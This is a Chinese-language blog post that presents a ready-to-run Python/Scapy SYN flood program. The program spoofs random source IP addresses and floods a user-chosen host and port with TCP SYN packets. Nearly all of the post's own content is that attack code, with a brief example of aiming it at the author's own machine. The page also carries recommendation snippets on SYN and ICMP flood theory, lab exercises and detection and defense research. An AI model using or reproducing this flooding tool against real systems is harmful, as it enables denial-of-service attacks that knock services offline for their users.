洪泛攻击程序

最新推荐文章于 2024-05-19 11:09:09 发布
最新推荐文章于 2024-05-19 11:09:09 发布
阅读量369 收藏 8
点赞数 9
分类专栏: python 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61991146/article/details/135188457
版权

类的实现

from scapy.all import *
import random
import socket
class IPGeneration :
    def __init__(self):
         self.__ip=''
         self.__localIP=socket.gethostbyname(socket.gethostname())
    def getRandomIP(self):
        while True:
            self.__ip = str(random.randint(128,150))+'.'\
                         +str(random.randint(1,254))+'.'\
                         +str(random.randint(1,254))+'.'\
                         +str(random.randint(1,254))
            if self.__ip != self .__localIP:
                return self .__ip
class SynFlood:
       def __init__( self,dIP,dport=445):
           self.__IPGeneration = IPGeneration()
           self.__srcIP="0.0.0.0"
           self.__dstIP=dIP
           self.__srcport=random.randint(1000,65535)
           self.__dstport=dport
           self.__times=0
       def attack ( self , times =10):
           self.__times=times
           while self.__times >0:
               self.__srcIP=self.__IPGeneration.getRandomIP()
               ipdata=IP(src=self.__srcIP,dst=self.__dstIP)
               tcpdata=TCP(sport=self.__srcport,dport=self.__dstport,flags="S")
               packet=ipdata/tcpdata
               send(packet,verbose=0)
               self.__times-=1
       def setDstIP(self,dIP):
           self.dstIP=dIP
       def getDstIP(self):
           return self.dstIP

洪泛攻击程序实现

from SynFlood import SynFlood
def main():
    attackIP=input("请输入攻击主机IP")
    attackPort=eval(input("请输入攻击主机的端口(例如:普通PC端口445,web服务器端口80,ftp服务器端口21):"))
    attacktimes=eval(input("请输入攻击次数:"))
    myFlood=SynFlood(attackIP,attackPort)
    myFlood.attack(attacktimes)

main()

假设

主机ip为:10.84.83.7

攻击本机 IP:10.84.83.7,端口:445

苹果苹果梨
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
网络安全实验--洪泛攻击.docx
06-09
网络安全实验--洪泛攻击 网络安全实验--洪泛攻击全文共4页,当前为第1页。网络安全实验--洪泛攻击全文共4页,当前为第1页。实验目的和要求 网络安全实验--洪泛攻击全文共4页,当前为第1页。 网络安全实验--洪泛攻击全文共4页,当前为第1页。 理解带宽攻击原理 理解资源消耗攻击原理 掌握洪泛攻击网络行为特征 实验内容和原理 1.SYN Flood攻击 Dos(Denial of Service)拒绝服务攻击是指在特定攻击发生后,被攻击的对象不能及时提供应有的服务。从广义上说,任何导致服务器不能正常提供服务的攻击都是拒绝服务攻击。 SYN Flood是当前最流行的拒绝服务攻击之一,这是一种利用TCP协议缺陷,发送大量的伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 TCP协议是基于连接的,也就是说,为了在服务端和客户端之间传送TCP数据,必须先建立一个虚拟电路,也就是TCP连接。 建立TCP连接的标准过程是这样的: 第一步,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口以及TCP连接的初始序号; 第二步,服务器在收到客户端的SYN报文 ,将返回一个SYN+ACK的报文,表示客户端的请求被接受,同时TCP序号被加1,ACK即确认(Acknowledgement); 第三步,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加1,到此一个TCP连接完成。 以上的连接过程在TCP协议中被称为三次握手。 问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN超时,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃——即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称作:服务器端受到了SYN Flood攻击(SYN洪水攻击)。 2.ICMP Flood攻击 正常情况下,为了对网络进行诊断,一些诊断程序,比如Ping等,会发出ICMP请求报文(ICMP Request),计算机接收到ICMP请求后,会回应一个ICMP应答报文。而这个过程是需要CPU处理的,有的情况下还可能消耗掉大量的资源,比如处理分片的时候。这样如果攻击者向目标计算机发送大量的ICMP Request报文(产生ICMP洪水),则目标计算机会忙于处理这些请求报文,而无法继续处理其它的网络数据报文,这也是一种拒绝服务攻网络安全实验--洪泛攻击全文共4页,当前为第2页。网络安全实验--洪泛攻击全文共4页,当前为第2页。击(DOS)。 网络安全实验--洪泛攻击全文共4页,当前为第2页。 网络安全实验--洪泛攻击全文共4页,当前为第2页。 对于诸如此类洪泛攻击,可以利用设置防火墙和关闭不必要的端口来加以防范。设置防火墙可以直接拒绝接受非法的或不可信任的用户的连接,而关闭不必要的端口可以减少半连接的可能性,从而有效的抑制洪泛攻击所带来的危害。下面给出一些具体实施办法: 监控计算资源的使用。例如建立资源分配模型图,统计敏感的计算资源使用情况。 修补漏洞。例如给操作系统或应用软件包升级。 关掉不必要的TCP/IP服务。关掉系统中不需要的服务,以防止攻击者利用。 过滤网络异常包。例如通过防火墙配置阻断来自Internet的恶意请求。 三、主要仪器设备 Windows操作系统,企业网络结构,Nmap 洪泛工具 网络协议分析器。 操作方法与实验步骤 本练习主机A、B为一组,C、D为一组,E、F为一组。实验角色说明如下: 实验主机 实验角色 主机A、C、E 攻击者(扫描主机) 主机B、D、F 靶机(被扫描主机) 首先使用"快照X"恢复Windows系统环境。 一.SYN洪水攻击 1. 捕获洪水数据 (1)攻击者单击实验平台工具栏中的"协议分析器"按钮,启动协议分析器。单击工具栏"定义过滤器"按钮,在弹出的"定义过滤器"窗口中设置如下过滤条件: 在"网络地址"属性页中输入"any<->同组主机IP地址"; 在"协议过滤"属性页中选中"协议树"
一种面向SIP洪泛攻击的检测方法 (2013年)
05-19
针对SIP洪泛攻击检测与防御的研究现状,结合SIP洪泛攻击的流量和SIP用户的实际环境特点,提出了一种基于泊松分布的自适应网络环境变化的检测方法,包括参数初始化、基于概率密度的检测机制和SIP消息过滤器。根据泊松分布和正态分布建立请求消息数目模型,利用概率密度和检测因子建立检测机制可信度,SIP消息过滤器利用指数加权移动平均(EWMA)机制解决因为网络环境的变化导致检测效率下降问题。模拟实际的SIP网络环境进行建模,采用SIP模拟呼叫器发起不同概率的呼叫模拟不同的网络状况。实验结果表明,设计的方法能够实时
防止洪泛攻击之测试方法.docx
07-18
该方法主要描述安防监控领域实用开源linux系统的嵌入式设备,如何使用iptable命令行测试网络安全的方法
面向链路洪泛攻击的多维检测与动态防御方法
01-20
针对现有链路洪泛攻击检测存在的不足,提出了多维指标检测算法,通过会话连接时长、数据分组低速比例、数据分组距离均匀性、平均低速率数据分组占比、低速数据分组占比变化率5维要素对存在异常的转发链路进行多维检测,改善了现有方法误报率高的情况。进一步,提出基于染色理论的“控制器-交换机”动态部署方法,解决了现有防御缓解机制存在的“难以实际部署在交换机变体类型受限的实际环境中”问题。最后,实验验证所提方法的有效性。
Flood_C_路由_floodingrouting_洪泛_
09-30
C语言路由洪泛算法,通过洪泛确定到达目的地所走过的节点等功能。
洪水攻击程序c语言,洪水攻击原理及代码实现全攻略(附源代码)病毒防范 -电脑资料...
weixin_34754795的博客
05-18 744
声明:本文所提供的资料仅仅限于技术交流和学习,请不要用于其他非法目的,维护网络安全是我们的共同责任,下载本文源代码和例程一、 什么是洪水攻击洪水之猛、势不可挡。如果将洪水比作对计算机的攻击,那大家可以想象得出,攻击是多的猛烈。在安全领域所指的洪水攻击是指向目标机器发送大量无用的数据包,使得目标机器忙于处理这些无用的数据包,而无法处理正常的数据包。在攻击过程中,目标机器的CPU的使用率将高于正常值,...
SYN洪泛攻击
weixin_42067873的博客
07-06 717
TCP SYN泛洪发生在OSI第四层,这种方式利用TCP协议的特性,就是三次握手。攻击者发送TCP SYN,SYN是TCP三次握手中的第一个数据包,而当服务器返回ACK后,该攻击者就不对其进行再确认,那这个TCP连接就处于挂起状态,也就是所谓的半连接状态,服务器收不到再确认的话,还会重复发送ACK给攻击者。这样更加会浪费服务器的资源。攻击者就对服务器发送非常大量的这种TCP连接,由于每一个都没法完成三次握手,所以在服务器上,这些TCP连接会因为挂起状态而消耗CPU和内存,最后服务器可能死机,就无法为正常用户
TCP SYN洪泛攻击的原理及防御方法
热门推荐
phymat.nico的专栏
12-17 2万+
尽管这种攻击已经出现了十四年,但它的变种至今仍能看到。虽然能有效对抗SYN洪泛的技术已经存在,但是没有对于TCP实现的一个标准的补救方法出现。你可以在如今的操作系统和设备中找到保护应用层和网络层的不同解决方案的不同实现。本篇论文详细描述这种攻击并展望和评估现在应用于终端主机和网络设备的对抗SYN洪泛方法。 1 基本的漏洞 SYN洪泛攻击首次出现在1996年。当时Phrack杂志中描述了这种攻击
洪泛攻击原理和防范
weixin_67332715的博客
09-04 749
还有一些其他的洪泛攻击方式,比如 ICMP Flood、HTTP Flood、DNS Flood 等,攻击方式都是类似的,都是通过大量的请求占用目标系统的资源,使其无法正常工作。SYN Flood就是A跟B打招呼,B回话,A不理B,让B挂起待机等着A回话,这个时候A1,A2,A3,,,An都来给B打招呼,但是打完招呼都不理B,放在计算机上就是一种负担直到崩溃。建立连接的过程中,攻击者发送大量的 SYN 请求,然后目标系统等待响应的时候消耗了大量的资源而无法处理正常的请求,从而导致系统崩溃或者服务拒绝。
Ping洪泛攻击
weixin_40191861的博客
08-22 295
(英語:)是一种简单的,攻击者使用ICMP“”(ping)数据包压倒受害者。如果攻击者的带宽比受害者多(例如,攻击者使用或者更快的光缆,而受害者使用),则最成功。攻击者希望受害者用ICMP“echo-reply”数据包进行响应,从而消耗传出带宽和传入带宽。如果目标系统足够慢,那么就有可能消耗足够长的CPU时间,因此用户就会注意到系统和正在运行的软件变得缓慢。
SYN泛洪攻击程序设计
天天学安全专属博客
10-29 1626
SYN泛洪攻击程序设计,包含了SYN泛洪攻击详细代码
ddos之icmp洪泛攻击源代码
zy627836411的博客
04-05 6048
声明:          该内容旨在分析网络攻击的存在形式,并不是为了鼓励大家使用文中的方式去攻击别人的计算机和网络。技术是为了造福人类的不是为了以破坏别人电脑谋取利益为出发点做违法的事情的。网络安全和文明是大家应该共同承担和维护的。          参考论文《高速复杂网络环境下异常流量检测技术研究》(解放军信息工程大学)          DDOS是指采用分布、协议的大规模Dos攻击方式
计算机网络_SYN洪泛攻击的具体过程和解决方法
Weiami的博客
12-31 5231
计算机网络 传输层 SYN洪泛攻击 SYN洪泛攻击发生在三次握手建立TCP连接的过程中。 1.具体过程 攻击者发送TCP的SYN,服务器返回ACK后,该攻击者就不对其进行确认,那么这个TCP连接处于挂起状态,所谓的半连接状态。 服务器收不到再确认的话,还会重复发送ACK给攻击者,这样就更加浪费服务器资源。 攻击者如果发送非常大量的这种TCP连接,由于每一个都无法完成三次握手,所以服务器上这些TCP连接会因为挂起状态而消耗CPU和内存,最后服务器可能死机,就无法为正常用户提供服务。 2.解决方法(SYN
Tcp连接的建立及SYN洪泛攻击
修心
11-21 2503
Tcp连接的建立及SYN洪泛攻击 Tcp连接的建立(三次握手) ​ 连接建立前,服务器进程处于LISTEN状态,等待客户的连接请求。 ​   一: 客户端发送tcp连接请求报文段,Tcp首部SYN=1,seq=x。(Tcp规定,SYN报文段不能携带数据,但要消耗掉一个序号) ​   二: 服务器的Tcp收到连接请求报文段后,如果同意建立连接,则向客户端发回确认,并为该Tcp连接分配缓存和变量。确认报文段中,SYN=1,ACK=1,ack=x+1,seq=y(自己选择的一个初始序号y)。(确认报文段中
python学习-使用pandas库分析excel表,并导出所需的表
SixSix的自留地
05-16 258
使用pandas库分析excel表中多个子表的数据
使用Python操作excel单元格——在单元格中插入公式
xll_007的博客
05-16 374
使用Python操作excel单元格——在单元格中插入公式。 通过使用Python的openpyxl库,来操作excel单元格,在单元格中插入公式的操作。把学习的过程分享给大家。大佬勿喷!
geopandas快速入门报错1
最新发布
weixin_45213317的博客
05-19 179
报错:CRSError: Invalid projection: EPSG:4326: (Internal Proj Error: proj_create: no database context specified)解决方法:重新下载适合自己Python版本的pyproj安装。
Gradio 案例——将 dicom 文件转为 nii文件
蒋含竹的博客
05-15 366
Gradio 的WEB界面案例:利用 SimpleITK 库,将 dicom 文件转为 nii文件
怎么预防洪泛导致的攻击
03-04
可以采取以下措施预防洪泛导致的攻击:1.加强网络安全意识,提高安全防范能力;2.建立完善的安全防护体系,包括防火墙、入侵检测系统等;3.定期备份数据,确保数据安全;4.加强对系统漏洞的修补和更新;5.限制网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苹果苹果梨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值